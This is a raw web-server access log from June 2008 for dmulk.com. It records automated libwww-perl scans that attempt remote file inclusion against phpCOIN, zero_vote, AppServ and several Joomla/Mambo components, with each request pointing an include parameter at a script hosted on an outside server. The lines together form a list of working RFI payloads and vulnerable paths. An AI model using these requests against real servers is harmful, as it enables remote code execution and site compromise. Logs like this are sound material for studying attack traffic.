67.205.74.80 - - [17/Jun/2008:12:33:38 -0700] "GET /logs//skin/zero_vote/ask_password.php?dir=http://220.130.55.207/adu/special.txt???? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "www.dmulk.com"
85.119.244.16 - - [17/Jun/2008:12:33:40 -0700] "GET /logs/access_080312.log/errors.php?error=http://usuarios.arnet.com.ar/larry123/safe.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
85.119.244.16 - - [17/Jun/2008:12:33:40 -0700] "GET /errors.php?error=http://usuarios.arnet.com.ar/larry123/safe.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
85.119.244.16 - - [17/Jun/2008:12:33:40 -0700] "GET /logs/errors.php?error=http://usuarios.arnet.com.ar/larry123/safe.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
67.205.74.80 - - [17/Jun/2008:12:33:47 -0700] "GET /logs/access_071224.log//skin/zero_vote/ask_password.php?dir=http://220.130.55.207/adu/special.txt???? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "www.dmulk.com"
80.74.144.24 - - [17/Jun/2008:12:33:49 -0700] "GET /logs/access_071224.log//skin/zero_vote/ask_password.php?dir=http://220.130.55.207/adu/special.txt???? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
80.74.144.24 - - [17/Jun/2008:12:33:50 -0700] "GET //skin/zero_vote/ask_password.php?dir=http://220.130.55.207/adu/special.txt???? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
80.74.144.24 - - [17/Jun/2008:12:33:50 -0700] "GET /logs//skin/zero_vote/ask_password.php?dir=http://220.130.55.207/adu/special.txt???? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
80.74.144.24 - - [17/Jun/2008:12:33:52 -0700] "GET /logs/access_071224.log//skin/zero_vote/ask_password.php?dir=http://220.130.55.207/adu/special.txt???? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
80.74.144.24 - - [17/Jun/2008:12:33:52 -0700] "GET //skin/zero_vote/ask_password.php?dir=http://220.130.55.207/adu/special.txt???? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
80.74.144.24 - - [17/Jun/2008:12:33:53 -0700] "GET /logs//skin/zero_vote/ask_password.php?dir=http://220.130.55.207/adu/special.txt???? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
67.19.120.178 - - [17/Jun/2008:12:34:03 -0700] "GET //appserv/main.php?appserv_root=http://zeroboss.helloweb.eu/id.txt???? HTTP/1.1" 404 275 "-" "libwww-perl/5.812" "www.dmulk.com"
67.19.120.178 - - [17/Jun/2008:12:34:03 -0700] "GET /logs//appserv/main.php?appserv_root=http://zeroboss.helloweb.eu/id.txt???? HTTP/1.1" 404 275 "-" "libwww-perl/5.812" "www.dmulk.com"
64.15.147.86 - - [17/Jun/2008:12:34:09 -0700] "GET /logs/access_071228.log//skin/zero_vote/ask_password.php?dir=http://220.130.55.207/adu/special.txt???? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "www.dmulk.com"
64.15.147.86 - - [17/Jun/2008:12:34:09 -0700] "GET //skin/zero_vote/ask_password.php?dir=http://220.130.55.207/adu/special.txt???? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "www.dmulk.com"
64.15.147.86 - - [17/Jun/2008:12:34:09 -0700] "GET /logs//skin/zero_vote/ask_password.php?dir=http://220.130.55.207/adu/special.txt???? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "www.dmulk.com"
80.74.144.24 - - [17/Jun/2008:12:34:21 -0700] "GET //skin/zero_vote/ask_password.php?dir=http://220.130.55.207/adu/special.txt???? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
66.249.73.161 - - [17/Jun/2008:12:34:23 -0700] "GET /?show=gallery&pageid=159 HTTP/1.1" 200 54301 "-" "Mozilla/5.0 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)" "www.dmulk.com"
80.74.144.24 - - [17/Jun/2008:12:34:24 -0700] "GET //skin/zero_vote/ask_password.php?dir=http://220.130.55.207/adu/special.txt???? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
64.15.147.86 - - [17/Jun/2008:12:34:35 -0700] "GET /logs/access_071224.log//skin/zero_vote/ask_password.php?dir=http://220.130.55.207/adu/special.txt???? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "www.dmulk.com"
63.247.139.189 - - [17/Jun/2008:12:34:36 -0700] "GET //skin/zero_vote/ask_password.php?dir=http://220.130.55.207/adu/special.txt???? HTTP/1.1" 404 275 "-" "libwww-perl/5.811" "www.dmulk.com"
63.247.139.189 - - [17/Jun/2008:12:34:36 -0700] "GET //skin/zero_vote/ask_password.php?dir=http://220.130.55.207/adu/special.txt???? HTTP/1.1" 404 275 "-" "libwww-perl/5.811" "www.dmulk.com"
205.205.28.133 - - [17/Jun/2008:12:34:37 -0700] "GET //skin/zero_vote/ask_password.php?dir=http://220.130.55.207/adu/special.txt???? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
80.74.144.24 - - [17/Jun/2008:12:34:39 -0700] "GET /logs/access_071228.log//skin/zero_vote/ask_password.php?dir=http://220.130.55.207/adu/special.txt???? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
80.74.144.24 - - [17/Jun/2008:12:34:39 -0700] "GET /logs/access_071228.log//skin/zero_vote/ask_password.php?dir=http://220.130.55.207/adu/special.txt???? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
123.214.171.92 - - [17/Jun/2008:12:34:42 -0700] "GET /logs/administrator/components/com_linkdirectory/toolbar.linkdirectory.html.php?mosConfig_absolute_path=http://darkcrystal87.altervista.org/id_sin.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
123.214.171.92 - - [17/Jun/2008:12:34:42 -0700] "GET /administrator/components/com_linkdirectory/toolbar.linkdirectory.html.php?mosConfig_absolute_path=http://darkcrystal87.altervista.org/id_sin.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
205.205.28.133 - - [17/Jun/2008:12:34:44 -0700] "GET //skin/zero_vote/ask_password.php?dir=http://220.130.55.207/adu/special.txt???? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
65.55.211.28 - - [17/Jun/2008:12:34:44 -0700] "GET /presto/?S=D HTTP/1.1" 200 526 "-" "msnbot/1.1 (+http://search.msn.com/msnbot.htm)" "www.dmulk.com"
61.9.184.228 - - [17/Jun/2008:12:34:48 -0700] "GET /logs/access_071224.log//skin/zero_vote/ask_password.php?dir=http://220.130.55.207/adu/special.txt???? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
61.9.184.228 - - [17/Jun/2008:12:34:48 -0700] "GET //skin/zero_vote/ask_password.php?dir=http://220.130.55.207/adu/special.txt???? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
61.9.184.228 - - [17/Jun/2008:12:34:49 -0700] "GET /logs//skin/zero_vote/ask_password.php?dir=http://220.130.55.207/adu/special.txt???? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
67.205.74.80 - - [17/Jun/2008:12:35:01 -0700] "GET //skin/zero_vote/ask_password.php?dir=http://220.130.55.207/adu/special.txt???? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "www.dmulk.com"
61.9.184.228 - - [17/Jun/2008:12:35:05 -0700] "GET /logs/access_071224.log//skin/zero_vote/ask_password.php?dir=http://220.130.55.207/adu/special.txt???? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
61.9.184.228 - - [17/Jun/2008:12:35:06 -0700] "GET //skin/zero_vote/ask_password.php?dir=http://220.130.55.207/adu/special.txt???? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
61.9.184.228 - - [17/Jun/2008:12:35:06 -0700] "GET /logs//skin/zero_vote/ask_password.php?dir=http://220.130.55.207/adu/special.txt???? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
67.205.74.80 - - [17/Jun/2008:12:35:13 -0700] "GET //skin/zero_vote/ask_password.php?dir=http://220.130.55.207/adu/special.txt???? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "www.dmulk.com"
67.19.120.178 - - [17/Jun/2008:12:35:14 -0700] "GET /logs/access_080319.log//appserv/main.php?appserv_root=http://zeroboss.helloweb.eu/id.txt???? HTTP/1.1" 404 275 "-" "libwww-perl/5.812" "www.dmulk.com"
67.205.96.205 - - [17/Jun/2008:12:35:20 -0700] "GET //index.php?_REQUEST=&_REQUEST[option]=com_content&_REQUEST[Itemid]=1&GLOBALS=&mosConfig_absolute_path=http://www.somosvialibre.org/.bash_tmp?? HTTP/1.1" 200 50 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.8) Gecko/20051219 SeaMonkey/1.0b" "www.dmulk.com"
67.205.96.205 - - [17/Jun/2008:12:35:24 -0700] "GET /logs//index.php?_REQUEST=&_REQUEST[option]=com_content&_REQUEST[Itemid]=1&GLOBALS=&mosConfig_absolute_path=http://www.somosvialibre.org/.bash_tmp?? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.8) Gecko/20051219 SeaMonkey/1.0b" "www.dmulk.com"
64.40.147.56 - - [17/Jun/2008:12:35:31 -0700] "GET /logs/access_071228.log//skin/zero_vote/ask_password.php?dir=http://220.130.55.207/adu/special.txt???? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.dmulk.com"
67.19.120.178 - - [17/Jun/2008:12:35:32 -0700] "GET /logs/db.php?path_local=http://www.bgdgrouponline.com/images/prop/ids.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.812" "www.dmulk.com"
67.19.120.178 - - [17/Jun/2008:12:35:32 -0700] "GET /db.php?path_local=http://www.bgdgrouponline.com/images/prop/ids.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.812" "www.dmulk.com"
64.40.147.56 - - [17/Jun/2008:12:35:34 -0700] "GET //skin/zero_vote/ask_password.php?dir=http://220.130.55.207/adu/special.txt???? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.dmulk.com"
200.233.187.225 - - [17/Jun/2008:12:35:36 -0700] "GET /errors.php?error=http://electrometro.com.ve/wall/xpl/safeon??????? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
61.9.184.228 - - [17/Jun/2008:12:35:36 -0700] "GET /logs/access_071228.log//skin/zero_vote/ask_password.php?dir=http://220.130.55.207/adu/special.txt???? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
64.40.147.56 - - [17/Jun/2008:12:35:38 -0700] "GET /logs//skin/zero_vote/ask_password.php?dir=http://220.130.55.207/adu/special.txt???? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.dmulk.com"
64.15.147.86 - - [17/Jun/2008:12:35:44 -0700] "GET //skin/zero_vote/ask_password.php?dir=http://220.130.55.207/adu/special.txt???? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "www.dmulk.com"
61.9.184.228 - - [17/Jun/2008:12:36:03 -0700] "GET /logs/access_071228.log//skin/zero_vote/ask_password.php?dir=http://220.130.55.207/adu/special.txt???? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
64.40.147.56 - - [17/Jun/2008:12:36:09 -0700] "GET /logs/access_071224.log//skin/zero_vote/ask_password.php?dir=http://220.130.55.207/adu/special.txt???? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.dmulk.com"
64.15.147.86 - - [17/Jun/2008:12:36:33 -0700] "GET //skin/zero_vote/ask_password.php?dir=http://220.130.55.207/adu/special.txt???? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "www.dmulk.com"
67.205.74.45 - - [17/Jun/2008:12:37:21 -0700] "GET /logs//index.php?option=com_lmo&Itemid=&mosConfig_absolute_path=http://www.aranytoll.csillagszemek.hu/modules/safe.txt??????? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
67.205.74.45 - - [17/Jun/2008:12:37:23 -0700] "GET //index.php?option=com_lmo&Itemid=&mosConfig_absolute_path=http://www.aranytoll.csillagszemek.hu/modules/safe.txt??????? HTTP/1.1" 200 18565 "-" "libwww-perl/5.808" "www.dmulk.com"
85.119.244.16 - - [17/Jun/2008:12:37:24 -0700] "GET /logs/access_080215.log/errors.php?error=http://usuarios.arnet.com.ar/larry123/safe.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
205.205.28.133 - - [17/Jun/2008:12:37:25 -0700] "GET /logs//skin/zero_vote/ask_password.php?dir=http://220.130.55.207/adu/special.txt???? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
205.205.28.133 - - [17/Jun/2008:12:37:26 -0700] "GET //skin/zero_vote/ask_password.php?dir=http://220.130.55.207/adu/special.txt???? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
74.55.76.110 - - [17/Jun/2008:12:37:28 -0700] "GET /logs/administrator/components/com_linkdirectory/toolbar.linkdirectory.html.php?mosConfig_absolute_path=http://darkcrystal87.altervista.org/id_sin.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.812" "www.dmulk.com"
74.55.76.110 - - [17/Jun/2008:12:37:28 -0700] "GET /administrator/components/com_linkdirectory/toolbar.linkdirectory.html.php?mosConfig_absolute_path=http://darkcrystal87.altervista.org/id_sin.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.812" "www.dmulk.com"
63.247.139.189 - - [17/Jun/2008:12:37:39 -0700] "GET /logs/access.log//phpcoin//coin_includes/constants.php?_CCFG[_PKG_PATH_INCL]=http://220.130.55.207/adu/special.txt???? HTTP/1.1" 404 275 "-" "libwww-perl/5.811" "www.dmulk.com"
63.247.139.189 - - [17/Jun/2008:12:37:39 -0700] "GET //phpcoin//coin_includes/constants.php?_CCFG[_PKG_PATH_INCL]=http://220.130.55.207/adu/special.txt???? HTTP/1.1" 404 275 "-" "libwww-perl/5.811" "www.dmulk.com"
63.247.139.189 - - [17/Jun/2008:12:37:39 -0700] "GET /logs//phpcoin//coin_includes/constants.php?_CCFG[_PKG_PATH_INCL]=http://220.130.55.207/adu/special.txt???? HTTP/1.1" 404 275 "-" "libwww-perl/5.811" "www.dmulk.com"
63.247.139.189 - - [17/Jun/2008:12:37:40 -0700] "GET /logs/access.log//phpcoin//coin_includes/constants.php?_CCFG[_PKG_PATH_INCL]=http://220.130.55.207/adu/special.txt???? HTTP/1.1" 404 275 "-" "libwww-perl/5.811" "www.dmulk.com"
63.247.139.189 - - [17/Jun/2008:12:37:40 -0700] "GET //phpcoin//coin_includes/constants.php?_CCFG[_PKG_PATH_INCL]=http://220.130.55.207/adu/special.txt???? HTTP/1.1" 404 275 "-" "libwww-perl/5.811" "www.dmulk.com"
63.247.139.189 - - [17/Jun/2008:12:37:40 -0700] "GET /logs//phpcoin//coin_includes/constants.php?_CCFG[_PKG_PATH_INCL]=http://220.130.55.207/adu/special.txt???? HTTP/1.1" 404 275 "-" "libwww-perl/5.811" "www.dmulk.com"
67.205.74.80 - - [17/Jun/2008:12:37:47 -0700] "GET /logs/access.log//phpcoin//coin_includes/constants.php?_CCFG[_PKG_PATH_INCL]=http://220.130.55.207/adu/special.txt???? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "www.dmulk.com"
67.205.74.80 - - [17/Jun/2008:12:37:47 -0700] "GET //phpcoin//coin_includes/constants.php?_CCFG[_PKG_PATH_INCL]=http://220.130.55.207/adu/special.txt???? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "www.dmulk.com"
67.205.74.80 - - [17/Jun/2008:12:37:47 -0700] "GET /logs//phpcoin//coin_includes/constants.php?_CCFG[_PKG_PATH_INCL]=http://220.130.55.207/adu/special.txt???? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "www.dmulk.com"
205.205.28.133 - - [17/Jun/2008:12:37:52 -0700] "GET /logs/access.log//phpcoin//coin_includes/constants.php?_CCFG[_PKG_PATH_INCL]=http://220.130.55.207/adu/special.txt???? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
205.205.28.133 - - [17/Jun/2008:12:37:52 -0700] "GET //phpcoin//coin_includes/constants.php?_CCFG[_PKG_PATH_INCL]=http://220.130.55.207/adu/special.txt???? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
205.205.28.133 - - [17/Jun/2008:12:37:52 -0700] "GET /logs//phpcoin//coin_includes/constants.php?_CCFG[_PKG_PATH_INCL]=http://220.130.55.207/adu/special.txt???? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
200.233.187.225 - - [17/Jun/2008:12:37:56 -0700] "GET //components/com_simpleboard/image_upload.php?sbp=http://electrometro.com.ve/wall/xpl/safeon??????? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
87.106.53.194 - - [17/Jun/2008:12:37:59 -0700] "GET /logs//login.php?dir=ftp://193.253.223.43/tmp/trem/oldbisok?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
87.106.53.194 - - [17/Jun/2008:12:38:00 -0700] "GET /logs//login.php?dir=http://xxxxxx.xxxxx.xxx.gif? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
87.106.53.194 - - [17/Jun/2008:12:38:00 -0700] "GET //login.php?dir=ftp://193.253.223.43/tmp/trem/oldbisok?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
87.106.53.194 - - [17/Jun/2008:12:38:01 -0700] "GET //login.php?dir=http://xxxxxx.xxxxx.xxx.gif? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
80.74.144.24 - - [17/Jun/2008:12:38:02 -0700] "GET /logs//skin/zero_vote/ask_password.php?dir=http://220.130.55.207/adu/special.txt???? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
80.74.144.24 - - [17/Jun/2008:12:38:03 -0700] "GET //skin/zero_vote/ask_password.php?dir=http://220.130.55.207/adu/special.txt???? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
205.205.28.133 - - [17/Jun/2008:12:38:03 -0700] "GET /logs/access.log//phpcoin//coin_includes/constants.php?_CCFG[_PKG_PATH_INCL]=http://220.130.55.207/adu/special.txt???? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
205.205.28.133 - - [17/Jun/2008:12:38:03 -0700] "GET //phpcoin//coin_includes/constants.php?_CCFG[_PKG_PATH_INCL]=http://220.130.55.207/adu/special.txt???? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
205.205.28.133 - - [17/Jun/2008:12:38:04 -0700] "GET /logs//phpcoin//coin_includes/constants.php?_CCFG[_PKG_PATH_INCL]=http://220.130.55.207/adu/special.txt???? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
87.106.53.194 - - [17/Jun/2008:12:38:08 -0700] "GET /logs/access_071219.log//components/com_simpleboard/image_upload.php?sbp=ftp://193.253.223.43/tmp/trem/oldbisok?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
87.106.53.194 - - [17/Jun/2008:12:38:08 -0700] "GET /logs/access_071219.log//components/com_simpleboard/image_upload.php?sbp=http://xxxxxx.xxxxx.xxx.gif? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
87.106.53.194 - - [17/Jun/2008:12:38:09 -0700] "GET /logs//components/com_simpleboard/image_upload.php?sbp=ftp://193.253.223.43/tmp/trem/oldbisok?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
87.106.53.194 - - [17/Jun/2008:12:38:09 -0700] "GET /logs//components/com_simpleboard/image_upload.php?sbp=http://xxxxxx.xxxxx.xxx.gif? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
74.52.139.226 - - [17/Jun/2008:12:38:11 -0700] "GET /logs/components/com_mtree/Savant2/Savant2_Plugin_stylesheet.php?mosConfig_absolute_path=http://nozyk.org/rob.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "www.dmulk.com"
74.52.139.226 - - [17/Jun/2008:12:38:11 -0700] "GET /components/com_mtree/Savant2/Savant2_Plugin_stylesheet.php?mosConfig_absolute_path=http://nozyk.org/rob.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "www.dmulk.com"
80.74.144.24 - - [17/Jun/2008:12:38:20 -0700] "GET /logs/access.log//phpcoin//coin_includes/constants.php?_CCFG[_PKG_PATH_INCL]=http://220.130.55.207/adu/special.txt???? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
80.74.144.24 - - [17/Jun/2008:12:38:20 -0700] "GET //phpcoin//coin_includes/constants.php?_CCFG[_PKG_PATH_INCL]=http://220.130.55.207/adu/special.txt???? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
80.74.144.24 - - [17/Jun/2008:12:38:21 -0700] "GET /logs//phpcoin//coin_includes/constants.php?_CCFG[_PKG_PATH_INCL]=http://220.130.55.207/adu/special.txt???? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
205.205.28.133 - - [17/Jun/2008:12:38:37 -0700] "GET /logs//skin/zero_vote/ask_password.php?dir=http://220.130.55.207/adu/special.txt???? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
205.205.28.133 - - [17/Jun/2008:12:38:38 -0700] "GET //skin/zero_vote/ask_password.php?dir=http://220.130.55.207/adu/special.txt???? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
67.205.74.80 - - [17/Jun/2008:12:38:48 -0700] "GET /logs/access.log//phpcoin//coin_includes/constants.php?_CCFG[_PKG_PATH_INCL]=http://220.130.55.207/adu/special.txt???? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "www.dmulk.com"
67.205.74.80 - - [17/Jun/2008:12:38:49 -0700] "GET //phpcoin//coin_includes/constants.php?_CCFG[_PKG_PATH_INCL]=http://220.130.55.207/adu/special.txt???? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "www.dmulk.com"
67.205.74.80 - - [17/Jun/2008:12:38:49 -0700] "GET /logs//phpcoin//coin_includes/constants.php?_CCFG[_PKG_PATH_INCL]=http://220.130.55.207/adu/special.txt???? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "www.dmulk.com"
64.15.147.86 - - [17/Jun/2008:12:39:01 -0700] "GET /logs/access.log//phpcoin//coin_includes/constants.php?_CCFG[_PKG_PATH_INCL]=http://220.130.55.207/adu/special.txt???? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "www.dmulk.com"
64.15.147.86 - - [17/Jun/2008:12:39:01 -0700] "GET //phpcoin//coin_includes/constants.php?_CCFG[_PKG_PATH_INCL]=http://220.130.55.207/adu/special.txt???? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "www.dmulk.com"
64.15.147.86 - - [17/Jun/2008:12:39:01 -0700] "GET /logs//phpcoin//coin_includes/constants.php?_CCFG[_PKG_PATH_INCL]=http://220.130.55.207/adu/special.txt???? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "www.dmulk.com"
80.74.144.24 - - [17/Jun/2008:12:39:05 -0700] "GET /logs//skin/zero_vote/ask_password.php?dir=http://220.130.55.207/adu/special.txt???? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
80.74.144.24 - - [17/Jun/2008:12:39:05 -0700] "GET //skin/zero_vote/ask_password.php?dir=http://220.130.55.207/adu/special.txt???? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
64.15.147.86 - - [17/Jun/2008:12:39:06 -0700] "GET /logs//skin/zero_vote/ask_password.php?dir=http://220.130.55.207/adu/special.txt???? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "www.dmulk.com"
64.15.147.86 - - [17/Jun/2008:12:39:06 -0700] "GET //skin/zero_vote/ask_password.php?dir=http://220.130.55.207/adu/special.txt???? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "www.dmulk.com"
67.205.74.80 - - [17/Jun/2008:12:39:11 -0700] "GET /logs//skin/zero_vote/ask_password.php?dir=http://220.130.55.207/adu/special.txt???? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "www.dmulk.com"
67.205.74.80 - - [17/Jun/2008:12:39:11 -0700] "GET //skin/zero_vote/ask_password.php?dir=http://220.130.55.207/adu/special.txt???? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "www.dmulk.com"
87.106.53.194 - - [17/Jun/2008:12:39:13 -0700] "GET /logs/access_080118.log//components/com_simpleboard/image_upload.php?sbp=ftp://193.253.223.43/tmp/trem/oldbisok?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
87.106.53.194 - - [17/Jun/2008:12:39:13 -0700] "GET /logs/access_080118.log//components/com_simpleboard/image_upload.php?sbp=http://xxxxxx.xxxxx.xxx.gif? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
64.15.147.86 - - [17/Jun/2008:12:39:19 -0700] "GET /logs/access.log//phpcoin//coin_includes/constants.php?_CCFG[_PKG_PATH_INCL]=http://220.130.55.207/adu/special.txt???? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "www.dmulk.com"
64.15.147.86 - - [17/Jun/2008:12:39:19 -0700] "GET //phpcoin//coin_includes/constants.php?_CCFG[_PKG_PATH_INCL]=http://220.130.55.207/adu/special.txt???? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "www.dmulk.com"
64.15.147.86 - - [17/Jun/2008:12:39:19 -0700] "GET /logs//phpcoin//coin_includes/constants.php?_CCFG[_PKG_PATH_INCL]=http://220.130.55.207/adu/special.txt???? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "www.dmulk.com"
80.74.144.24 - - [17/Jun/2008:12:39:33 -0700] "GET //phpcoin//coin_includes/constants.php?_CCFG[_PKG_PATH_INCL]=http://220.130.55.207/adu/special.txt???? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
63.247.139.189 - - [17/Jun/2008:12:39:36 -0700] "GET //phpcoin//coin_includes/constants.php?_CCFG[_PKG_PATH_INCL]=http://220.130.55.207/adu/special.txt???? HTTP/1.1" 404 275 "-" "libwww-perl/5.811" "www.dmulk.com"
69.153.245.161 - - [17/Jun/2008:12:39:40 -0700] "GET /blog/index.php/2008/04/03/hello-world/trackback HTTP/1.1" 200 6911 "-" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1)" "dmulk.com"
205.205.28.133 - - [17/Jun/2008:12:39:44 -0700] "GET //phpcoin//coin_includes/constants.php?_CCFG[_PKG_PATH_INCL]=http://220.130.55.207/adu/special.txt???? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
63.247.139.189 - - [17/Jun/2008:12:39:45 -0700] "GET //phpcoin//coin_includes/constants.php?_CCFG[_PKG_PATH_INCL]=http://220.130.55.207/adu/special.txt???? HTTP/1.1" 404 275 "-" "libwww-perl/5.811" "www.dmulk.com"
80.74.144.24 - - [17/Jun/2008:12:39:50 -0700] "GET /logs//appserv/main.php?appserv_root=http://220.130.55.207/adu/special.txt???? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
80.74.144.24 - - [17/Jun/2008:12:39:51 -0700] "GET //appserv/main.php?appserv_root=http://220.130.55.207/adu/special.txt???? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
205.205.28.133 - - [17/Jun/2008:12:39:51 -0700] "GET //phpcoin//coin_includes/constants.php?_CCFG[_PKG_PATH_INCL]=http://220.130.55.207/adu/special.txt???? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
67.205.74.80 - - [17/Jun/2008:12:40:11 -0700] "GET /logs//skin/zero_vote/ask_password.php?dir=http://220.130.55.207/adu/special.txt???? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "www.dmulk.com"
67.205.74.80 - - [17/Jun/2008:12:40:11 -0700] "GET //skin/zero_vote/ask_password.php?dir=http://220.130.55.207/adu/special.txt???? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "www.dmulk.com"
63.247.139.189 - - [17/Jun/2008:12:40:22 -0700] "GET /logs/access_080308.log//appserv/main.php?appserv_root=http://220.130.55.207/adu/special.txt???? HTTP/1.1" 404 275 "-" "libwww-perl/5.811" "dmulk.com"
63.247.139.189 - - [17/Jun/2008:12:40:23 -0700] "GET //appserv/main.php?appserv_root=http://220.130.55.207/adu/special.txt???? HTTP/1.1" 404 275 "-" "libwww-perl/5.811" "dmulk.com"
63.247.139.189 - - [17/Jun/2008:12:40:23 -0700] "GET /logs//appserv/main.php?appserv_root=http://220.130.55.207/adu/special.txt???? HTTP/1.1" 404 275 "-" "libwww-perl/5.811" "dmulk.com"
67.205.74.80 - - [17/Jun/2008:12:40:26 -0700] "GET //phpcoin//coin_includes/constants.php?_CCFG[_PKG_PATH_INCL]=http://220.130.55.207/adu/special.txt???? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "www.dmulk.com"
